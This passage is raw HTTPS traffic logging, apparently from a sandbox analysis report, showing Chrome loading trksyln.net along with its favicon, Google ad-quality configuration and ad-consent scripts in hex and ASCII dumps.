2024-10-31 18:19:38 UTC	160	OUT	Data Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 30 2c 6e 75 6c 6c 2c 31 5d 5d 2c 31 37 33 30 33 39 38 37 37 36 39 37 36 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 5d Data Ascii: [null,null,null,null,null,null,null,[[0,null,1]],1730398776976,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0]
2024-10-31 18:19:38 UTC	1862	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=utf-8 Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Origin: https://trksyln.net Access-Control-Allow-Credentials: true Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:38 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-ieclY9DtHVcg8kZOxlAz0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorLoggingHttp/web-reports?context=eJzjUtDikmII1JBicEqfwRoCxO5aF1n9gZjh6xVWDiAW4uHYNaV_J5tAx74li5mUXJLyC-OT8_NKUvNKdBNTinVB7KLMpNKS_CIUdmoZSEVOfnp6Zl56vJGBkYmhgbGBnoFxfIEBABKGKFo" Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49969	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:39 UTC	1232	OUT	GET /favicon.ico HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/Error Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: _ga=GA1.1.1627253267.1730398763; _ga_JH2MNQ1WXY=GS1.1.1730398763.1.0.1730398763.60.0.0; __gads=ID=306266a9c2348d29:T=1730398769:RT=1730398769:S=ALNI_Mbbw868vcgtQoLBWAGr_Cg5L1s2aA; __gpi=UID=00000f481e63bcec:T=1730398769:RT=1730398769:S=ALNI_Ma2HfWNKb2HbqWiBFztPiWyAdupEA; __eoi=ID=c1a37bea35cc93c0:T=1730398769:RT=1730398769:S=AA-AfjY72W63xu-aXyCL3e10qgJe; FCNEC=%5B%5B%22AKsRol9oUVcMXiFoqzkj1NEa08EJHnvQLU1QPHYF1L1Ozn0rxWlj1OU96qI8aKh50hz1fmLcU4sYmGwr3wGXMgFDvn_e8490-tvoBSDRIEcmLYrwc8BRbcmqmEeBeHgdMPnNSa3lMVW3T4Tr1qq5ui7eaUI39kjUvQ%3D%3D%22%5D%2Cnull%2C%5B%5B2%2C%22%5Bnull%2C%5Bnull%2C1%2C%5B1730398774%2C265359000%5D%5D%5D%22%5D%5D%5D
2024-10-31 18:19:40 UTC	301	IN	HTTP/1.1 200 OK Content-Type: image/x-icon Last-Modified: Tue, 11 Apr 2023 08:02:00 GMT Accept-Ranges: bytes ETag: "0ccbbe44b6cd91:0" Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:38 GMT Connection: close Content-Length: 15406
2024-10-31 18:19:40 UTC	15406	IN	Data Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 66 66 05 b8 b8 b8 7e cd cd cd d6 c7 c7 c7 e1 c6 c6 c6 e1 cb cb cb e1 c9 c9 c9 e1 c2 c2 c2 e1 bc bc bc e1 cf cf cf e1 cf cf cf e1 cf cf cf e1 cf cf cf e1 cf cf cf d6 be be be 7e 66 66 66 05 bc bc bc 7a c6 c6 c6 fe be be be ff 9a 9a 9a ff 99 99 99 ff 97 97 97 ff 99 99 99 ff 96 96 96 ff c0 c0 c0 ff ce ce ce ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 ff e3 e3 e3 fe be be be 7a cf cf cf ce ae ae ae ff a8 a8 a8 ff 9d 9d 9d ff bc bc bc ff 81 81 81 ff a4 a4 a4 ff b8 b8 b8 ff bc Data Ascii: h6 (00 h&( fff~~fffzz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49970	216.58.206.34	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:39 UTC	597	OUT	GET /getconfig/sodar?sv=200&tid=gda&tv=r20241028&st=env HTTP/1.1 Host: ep1.adtrafficquality.google Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://trksyln.net Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:39 UTC	610	IN	HTTP/1.1 200 OK P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Origin: * Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="f.txt" Date: Thu, 31 Oct 2024 18:19:39 GMT Server: cafe Cache-Control: private X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:39 UTC	768	IN	Data Raw: 34 32 38 36 0d 0a 7b 22 73 6f 64 61 72 5f 71 75 65 72 79 5f 69 64 22 3a 22 4f 38 6f 6a 5a 2d 37 43 4a 76 36 54 6a 75 77 50 77 61 62 74 6d 51 51 22 2c 22 69 6e 6a 65 63 74 6f 72 5f 62 61 73 65 6e 61 6d 65 22 3a 22 73 6f 64 61 72 32 22 2c 22 62 67 5f 68 61 73 68 5f 62 61 73 65 6e 61 6d 65 22 3a 22 4c 4b 4e 56 54 43 42 6d 6d 38 4c 4f 4e 4d 41 46 68 34 76 5a 61 54 49 6b 54 4b 76 72 77 39 4e 43 63 47 62 47 4a 42 78 62 6a 45 38 22 2c 22 62 67 5f 62 69 6e 61 72 79 22 3a 22 66 6c 52 31 4f 58 54 70 70 59 53 4f 39 63 46 56 39 4b 4e 59 43 6f 68 2b 62 30 53 61 50 45 64 76 4d 53 2f 51 62 74 73 33 2b 79 54 6c 73 52 55 51 48 4d 47 34 7a 59 38 39 4f 68 32 6b 38 73 78 44 7a 6d 79 4a 58 4f 62 6a 30 52 50 38 35 35 62 36 50 56 6a 71 38 74 44 4b 6f 68 51 31 53 30 45 79 6a 4e Data Ascii: 4286{"sodar_query_id":"O8ojZ-7CJv6TjuwPwabtmQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flR1OXTppYSO9cFV9KNYCoh+b0SaPEdvMS/Qbts3+yTlsRUQHMG4zY89Oh2k8sxDzmyJXObj0RP855b6PVjq8tDKohQ1S0EyjN
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 65 50 79 65 37 30 30 2f 46 74 62 43 7a 73 35 48 51 72 37 4a 72 34 73 35 6d 57 2f 44 65 30 70 38 2b 71 58 65 6d 47 74 2b 70 32 75 7a 66 46 4c 47 31 56 51 53 50 37 6f 77 4e 2b 45 43 6b 52 6b 55 39 4f 76 74 62 52 46 4c 57 34 65 64 63 38 4b 71 78 53 74 76 62 6b 4f 6d 4f 59 31 35 4e 38 78 55 78 6e 51 67 4f 55 4d 2f 67 39 53 65 58 4d 77 30 56 47 30 75 6e 7a 69 39 39 77 43 42 71 54 43 77 2f 6b 4b 4a 65 59 33 32 2f 2f 35 6d 6c 79 72 58 4a 77 62 70 72 6c 4f 72 41 2b 6e 37 72 41 41 6c 32 73 77 37 57 53 34 55 6e 64 48 63 58 72 51 36 56 38 55 52 74 48 6e 7a 74 53 43 56 71 51 39 34 6a 75 35 38 4e 43 6b 61 61 34 53 68 72 6f 5a 64 4d 51 58 6a 53 2b 63 31 6b 69 71 30 44 30 42 54 4c 70 36 47 31 41 67 45 42 55 53 45 4d 37 34 58 4a 56 64 48 66 67 75 52 7a 69 6f 56 37 61 4f Data Ascii: ePye700/FtbCzs5HQr7Jr4s5mW/De0p8+qXemGt+p2uzfFLG1VQSP7owN+ECkRkU9OvtbRFLW4edc8KqxStvbkOmOY15N8xUxnQgOUM/g9SeXMw0VG0unzi99wCBqTCw/kKJeY32//5mlyrXJwbprlOrA+n7rAAl2sw7WS4UndHcXrQ6V8URtHnztSCVqQ94ju58NCkaa4ShroZdMQXjS+c1kiq0D0BTLp6G1AgEBUSEM74XJVdHfguRzioV7aO
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 44 6e 32 51 72 62 64 6f 2f 31 4e 30 70 48 34 48 58 72 78 37 50 49 78 33 47 4b 52 53 43 55 32 75 2b 71 76 55 6b 58 4e 65 67 32 30 61 6f 72 72 34 33 39 7a 41 35 61 74 47 32 79 52 35 67 32 35 72 74 67 74 2b 54 58 31 4b 74 49 4e 4c 51 6f 42 69 74 69 61 6d 67 66 4d 4a 68 42 6d 71 62 41 61 4a 61 63 76 2b 54 42 66 4e 6e 36 31 39 35 49 30 6c 4b 75 50 55 37 5a 61 6f 49 42 76 6b 54 69 67 57 4b 4d 47 67 55 31 57 30 52 7a 53 78 4a 69 31 54 47 6d 4a 4e 46 41 43 4a 77 61 56 56 33 54 4e 6c 4c 53 72 49 49 47 64 6e 38 6c 4c 66 34 75 79 31 72 53 45 62 38 4f 78 48 59 51 69 31 78 58 6b 49 74 38 6a 4a 41 38 77 53 7a 73 73 72 7a 61 6d 34 4f 48 4a 53 69 49 45 35 49 33 6f 6a 74 30 32 6c 50 77 4b 41 54 53 34 2f 53 4e 37 42 75 67 71 64 37 58 66 6b 37 73 66 73 49 6e 65 62 69 4a 54 Data Ascii: Dn2Qrbdo/1N0pH4HXrx7PIx3GKRSCU2u+qvUkXNeg20aorr439zA5atG2yR5g25rtgt+TX1KtINLQoBitiamgfMJhBmqbAaJacv+TBfNn6195I0lKuPU7ZaoIBvkTigWKMGgU1W0RzSxJi1TGmJNFACJwaVV3TNlLSrIIGdn8lLf4uy1rSEb8OxHYQi1xXkIt8jJA8wSzssrzam4OHJSiIE5I3ojt02lPwKATS4/SN7Bugqd7Xfk7sfsInebiJT
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 6a 68 55 36 71 76 6f 55 54 35 68 71 64 46 59 61 45 33 47 57 6d 33 6f 71 67 62 67 6e 6a 51 70 73 54 48 6f 49 33 65 39 61 70 71 68 56 36 77 46 56 6d 38 38 2b 50 45 7a 34 69 34 7a 4b 7a 67 6e 73 70 48 75 4f 6b 67 34 5a 6c 65 66 32 37 78 2f 4b 49 32 76 52 51 64 66 61 39 62 68 6e 72 42 32 32 72 2b 66 39 30 4c 39 4e 34 70 4a 42 43 59 52 63 6c 61 53 6e 36 5a 43 4d 2f 51 71 31 33 76 6c 41 64 6d 31 4b 53 6d 5a 6b 67 70 2f 78 68 39 50 6a 4a 38 54 46 44 53 45 64 72 5a 7a 47 46 52 55 47 47 34 61 4c 48 79 36 6d 41 39 67 73 61 38 7a 59 72 51 4a 43 66 48 59 62 63 49 32 68 55 32 75 5a 48 44 62 36 33 30 69 33 78 30 4d 31 58 46 57 35 32 76 30 2b 49 4d 37 50 53 4b 4e 6b 50 4c 75 54 50 50 6b 7a 56 52 35 59 68 6b 5a 49 7a 6e 4c 4b 47 65 69 69 45 55 79 47 72 6c 56 70 4f 57 6e Data Ascii: jhU6qvoUT5hqdFYaE3GWm3oqgbgnjQpsTHoI3e9apqhV6wFVm88+PEz4i4zKzgnspHuOkg4Zlef27x/KI2vRQdfa9bhnrB22r+f90L9N4pJBCYRclaSn6ZCM/Qq13vlAdm1KSmZkgp/xh9PjJ8TFDSEdrZzGFRUGG4aLHy6mA9gsa8zYrQJCfHYbcI2hU2uZHDb630i3x0M1XFW52v0+IM7PSKNkPLuTPPkzVR5YhkZIznLKGeiiEUyGrlVpOWn
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 64 64 41 76 58 46 72 58 68 63 75 4d 6b 69 46 79 4b 35 43 6d 52 47 41 37 72 4e 2f 30 55 66 4e 6b 39 53 54 54 72 31 45 62 53 77 2f 67 41 46 37 67 6e 42 61 6b 49 73 57 6e 65 64 46 67 47 7a 6f 4a 74 46 70 75 45 5a 52 6c 66 43 30 4a 43 42 31 5a 6e 32 6a 6d 38 70 49 50 47 38 64 39 30 66 63 47 47 62 38 79 67 47 33 76 5a 45 46 65 37 31 48 49 56 55 42 77 47 5a 53 50 6a 38 66 54 30 33 72 6d 50 4e 50 51 33 38 61 63 52 4e 48 31 2f 41 58 49 48 39 2b 48 67 67 45 42 41 48 4e 4e 77 53 46 6b 79 52 53 2f 74 6e 4d 77 6e 62 34 2f 34 46 7a 4c 70 78 63 6d 32 32 7a 55 43 6a 46 79 45 62 69 2f 67 57 38 65 65 69 79 77 4c 4b 48 54 49 79 50 4d 42 41 47 55 2f 2f 41 4d 31 47 51 45 34 57 64 57 77 69 71 32 70 38 4c 49 6f 64 53 66 59 69 55 65 62 34 64 6c 43 53 4b 63 6a 4e 53 6e 54 68 51 Data Ascii: ddAvXFrXhcuMkiFyK5CmRGA7rN/0UfNk9STTr1EbSw/gAF7gnBakIsWnedFgGzoJtFpuEZRlfC0JCB1Zn2jm8pIPG8d90fcGGb8ygG3vZEFe71HIVUBwGZSPj8fT03rmPNPQ38acRNH1/AXIH9+HggEBAHNNwSFkyRS/tnMwnb4/4FzLpxcm22zUCjFyEbi/gW8eeiywLKHTIyPMBAGU//AM1GQE4WdWwiq2p8LIodSfYiUeb4dlCSKcjNSnThQ
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 4e 48 63 7a 2b 57 4d 44 41 47 34 54 58 53 37 68 56 68 56 45 56 39 30 4a 79 68 78 6f 2b 4d 6e 45 51 67 34 42 4d 6f 78 6e 48 6d 41 33 47 34 62 64 47 6f 58 46 41 42 42 57 4c 38 69 65 66 30 53 55 61 48 49 2f 69 6e 50 31 64 2f 76 6b 61 4a 55 61 53 78 2f 61 77 76 7a 33 37 61 51 33 47 47 35 31 5a 79 64 55 42 45 74 57 4a 66 32 4c 61 48 4a 39 4b 4f 78 41 58 51 57 79 78 58 30 36 33 58 51 57 78 35 30 57 38 6d 49 31 66 2f 74 2b 58 5a 31 34 38 35 68 36 58 67 75 59 46 4f 36 77 4b 77 2f 43 4f 65 67 39 55 66 72 76 6c 58 55 66 2b 65 6a 32 64 45 43 4a 77 42 2f 31 63 78 79 56 57 31 68 76 37 32 35 6d 51 53 73 62 68 4d 4f 74 79 49 52 57 53 64 52 6e 72 35 76 42 5a 2f 46 55 65 53 31 62 4b 46 42 2f 7a 45 4d 4c 66 37 4e 55 4a 56 67 34 71 66 47 2f 50 41 6b 75 4d 44 39 37 6f 56 46 Data Ascii: NHcz+WMDAG4TXS7hVhVEV90Jyhxo+MnEQg4BMoxnHmA3G4bdGoXFABBWL8ief0SUaHI/inP1d/vkaJUaSx/awvz37aQ3GG51ZydUBEtWJf2LaHJ9KOxAXQWyxX063XQWx50W8mI1f/t+XZ1485h6XguYFO6wKw/COeg9UfrvlXUf+ej2dECJwB/1cxyVW1hv725mQSsbhMOtyIRWSdRnr5vBZ/FUeS1bKFB/zEMLf7NUJVg4qfG/PAkuMD97oVF
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 45 6f 59 6b 4c 36 63 77 55 49 47 4d 35 76 46 4e 68 4b 4e 67 54 44 62 68 61 6b 47 43 64 5a 4b 54 63 32 33 39 65 53 6e 54 72 2b 50 32 6b 4d 4f 53 66 79 38 4a 77 36 76 57 4b 41 46 41 59 67 73 72 64 6d 33 33 66 51 49 36 74 42 33 32 43 39 4e 71 7a 68 39 47 6b 46 72 45 50 48 32 59 4c 5a 59 4d 66 30 62 46 52 7a 63 45 7a 4e 36 49 63 73 44 59 7a 43 46 55 66 4e 53 4a 4f 51 34 53 35 77 64 56 46 50 6f 30 63 59 78 6b 4c 50 31 6b 35 6f 79 31 33 68 59 65 32 2b 2b 69 32 77 6c 4d 70 6f 63 76 48 48 7a 59 6c 47 53 78 6b 57 42 32 61 43 76 41 54 4e 58 50 5a 59 6b 2f 67 73 2b 46 49 46 6c 64 44 68 36 4a 36 49 75 59 6f 6d 77 6e 56 35 54 56 4c 5a 59 38 68 71 7a 4d 57 46 36 58 71 63 50 43 30 42 74 2b 37 6d 70 49 67 4c 33 2b 44 6f 58 45 45 56 48 6b 4f 66 50 51 6b 75 66 68 42 46 52 Data Ascii: EoYkL6cwUIGM5vFNhKNgTDbhakGCdZKTc239eSnTr+P2kMOSfy8Jw6vWKAFAYgsrdm33fQI6tB32C9Nqzh9GkFrEPH2YLZYMf0bFRzcEzN6IcsDYzCFUfNSJOQ4S5wdVFPo0cYxkLP1k5oy13hYe2++i2wlMpocvHHzYlGSxkWB2aCvATNXPZYk/gs+FIFldDh6J6IuYomwnV5TVLZY8hqzMWF6XqcPC0Bt+7mpIgL3+DoXEEVHkOfPQkufhBFR
2024-10-31 18:19:39 UTC	1378	IN	Data Raw: 47 55 42 44 7a 61 77 6a 76 62 4f 65 77 38 75 4a 39 50 70 66 4e 70 2b 6c 69 39 74 72 32 30 36 32 41 77 49 4d 38 49 7a 4f 72 42 57 54 48 6b 78 64 70 37 46 54 50 69 6b 5a 64 73 44 34 4f 35 56 72 31 5a 67 52 63 61 68 61 79 62 4b 76 58 48 6c 44 6d 44 38 31 56 42 63 30 4d 61 31 55 6b 37 7a 76 6c 34 49 57 54 55 67 4d 71 50 67 78 36 48 35 2f 69 43 31 6d 6a 4f 6d 5a 65 39 6f 6c 32 63 4d 77 61 42 68 58 70 75 36 38 6d 6a 59 47 55 51 69 77 43 6e 53 36 71 2f 57 50 30 7a 38 62 39 71 4f 44 32 53 37 72 49 65 6b 54 64 75 79 70 4b 4a 32 43 4a 65 42 34 38 6f 55 62 73 76 34 47 42 59 48 70 66 58 6c 73 39 66 47 69 57 2f 53 42 76 58 4a 6e 4d 2b 71 49 31 62 64 4e 6b 68 74 59 7a 6e 44 34 38 67 72 75 65 62 79 50 75 31 33 6f 2f 4c 51 6c 48 66 34 34 6f 65 49 30 61 4c 61 5a 55 32 34 Data Ascii: GUBDzawjvbOew8uJ9PpfNp+li9tr2062AwIM8IzOrBWTHkxdp7FTPikZdsD4O5Vr1ZgRcahaybKvXHlDmD81VBc0Ma1Uk7zvl4IWTUgMqPgx6H5/iC1mjOmZe9ol2cMwaBhXpu68mjYGUQiwCnS6q/WP0z8b9qOD2S7rIekTduypKJ2CJeB48oUbsv4GBYHpfXls9fGiW/SBvXJnM+qI1bdNkhtYznD48gruebyPu13o/LQlHf44oeI0aLaZU24
2024-10-31 18:19:40 UTC	1378	IN	Data Raw: 57 7a 36 6f 6d 61 36 41 6c 4f 56 37 66 76 67 42 66 47 75 4b 6a 6a 4c 4f 46 5a 78 69 46 64 51 37 4b 65 4a 45 6f 57 4d 76 4d 36 45 79 42 46 6a 37 31 4e 53 77 56 67 55 64 76 4e 35 2b 54 71 63 6a 2b 53 33 37 41 39 34 48 37 47 45 64 37 52 38 7a 48 45 50 55 33 45 59 69 52 79 33 73 74 4e 45 64 78 4e 50 2f 42 75 59 79 31 79 4b 66 58 6c 45 45 38 62 58 6f 4c 75 6e 68 50 45 32 69 73 6a 47 57 2b 6c 66 57 50 44 64 49 31 5a 4a 4f 6b 38 6e 57 58 59 30 79 34 47 63 6f 69 77 65 7a 49 70 57 39 59 4c 63 34 46 66 46 38 7a 78 45 70 48 73 49 66 76 38 30 65 52 44 33 30 5a 79 38 56 61 32 71 34 75 57 74 44 67 34 48 4a 33 79 35 33 45 7a 38 63 7a 79 73 4a 71 56 32 69 74 4b 31 6d 65 71 78 67 65 6a 45 5a 71 4b 69 48 61 2f 54 62 53 54 2b 71 30 64 35 66 6c 37 73 76 57 57 39 64 4e 33 46 Data Ascii: Wz6oma6AlOV7fvgBfGuKjjLOFZxiFdQ7KeJEoWMvM6EyBFj71NSwVgUdvN5+Tqcj+S37A94H7GEd7R8zHEPU3EYiRy3stNEdxNP/BuYy1yKfXlEE8bXoLunhPE2isjGW+lfWPDdI1ZJOk8nWXY0y4GcoiwezIpW9YLc4FfF8zxEpHsIfv80eRD30Zy8Va2q4uWtDg4HJ3y53Ez8czysJqV2itK1meqxgejEZqKiHa/TbST+q0d5fl7svWW9dN3F
2024-10-31 18:19:40 UTC	1378	IN	Data Raw: 54 50 6b 63 56 67 36 31 37 64 53 48 79 38 68 6b 77 5a 35 41 4b 51 4e 61 38 4d 4e 5a 48 4b 73 61 72 44 77 54 38 42 51 32 56 52 6e 6f 53 6e 7a 53 47 42 6c 49 77 57 71 53 44 53 77 64 39 73 75 52 78 4d 39 63 51 2f 69 61 61 41 77 30 63 4d 6b 61 61 6a 6b 35 4a 4f 2b 34 73 76 47 35 75 51 4e 57 5a 41 68 65 62 41 38 6d 76 51 74 33 63 79 2b 61 75 53 67 6a 38 31 35 69 4f 56 4c 76 67 66 67 59 52 74 52 53 39 4e 2f 4b 7a 78 33 6e 68 65 75 54 53 78 6e 35 43 76 5a 4c 77 49 48 34 59 63 43 30 38 57 79 43 38 6e 35 7a 61 2b 54 53 31 4f 37 56 4f 61 36 4d 4d 42 56 73 49 6f 56 34 53 6f 38 61 41 63 4d 6a 4d 4e 6f 53 31 79 7a 4c 6d 2f 68 2f 54 47 64 78 2b 72 65 76 58 48 6d 48 6b 65 78 36 71 75 54 6b 4c 48 42 73 49 44 34 36 61 72 33 37 31 52 2f 4a 50 78 59 6e 76 78 4e 5a 38 32 4f Data Ascii: TPkcVg617dSHy8hkwZ5AKQNa8MNZHKsarDwT8BQ2VRnoSnzSGBlIwWqSDSwd9suRxM9cQ/iaaAw0cMkaajk5JO+4svG5uQNWZAhebA8mvQt3cy+auSgj815iOVLvgfgYRtRS9N/Kzx3nheuTSxn5CvZLwIH4YcC08WyC8n5za+TS1O7VOa6MMBVsIoV4So8aAcMjMNoS1yzLm/h/TGdx+revXHmHkex6quTkLHBsID46ar371R/JPxYnvxNZ82O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49975	142.250.186.174	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:40 UTC	707	OUT	GET /f/AGSKWxUGL8xOsRaRP5PFyweqWIg8FLUl9Kj6bzVgUHc3lpUPZXC03phBxzVHNadhsFw6_SzGM2DcFUpr-aQhK_YmXtMeNnbqjjF6RvqMXAXnOY2uUuOqYG08zgv8dhrK8dARDb02qTW72dksb9BfH6gYBeExaqhirVZfYVfltGg-pJlYyh4-ZwVEQ-1y8o4E/_/googlempu.-scrollads.-banner-ad.=display_ad&_ads_iframe_ HTTP/1.1 Host: fundingchoicesmessages.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:40 UTC	1913	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Thu, 31 Oct 2024 18:19:40 GMT Content-Security-Policy: script-src 'report-sample' 'nonce-pE_WqvRGBvbL9E99ffD9bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: cross-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjytDikmJw15BikPj6kkkNiJ3SZ7AGAHHrzXOsk4E46d951gIgdte6yOoPxIYKl1jtgdix6BKrJxCr9lxiNQbi--susT4H4iKJK6wNQHy76QrrYyBm-HqFlQOIhXg49kzp38km8GPB-n5GJY2k_ML45Py8kqLMpNKS_KK05LTU4tSistSieCMDIxNDA2MDPQOD-AIDAG-lP6Y" Server: ESF X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-10-31 18:19:40 UTC	60	IN	Data Raw: 33 36 0d 0a 77 69 6e 64 6f 77 5b 27 61 63 37 65 36 30 35 39 2d 31 34 32 35 2d 34 63 34 61 2d 39 30 32 33 2d 61 38 36 61 65 32 38 36 39 37 37 61 27 5d 20 3d 20 74 72 75 65 3b 0d 0a Data Ascii: 36window['ac7e6059-1425-4c4a-9023-a86ae286977a'] = true;
2024-10-31 18:19:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49997	34.160.236.64	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
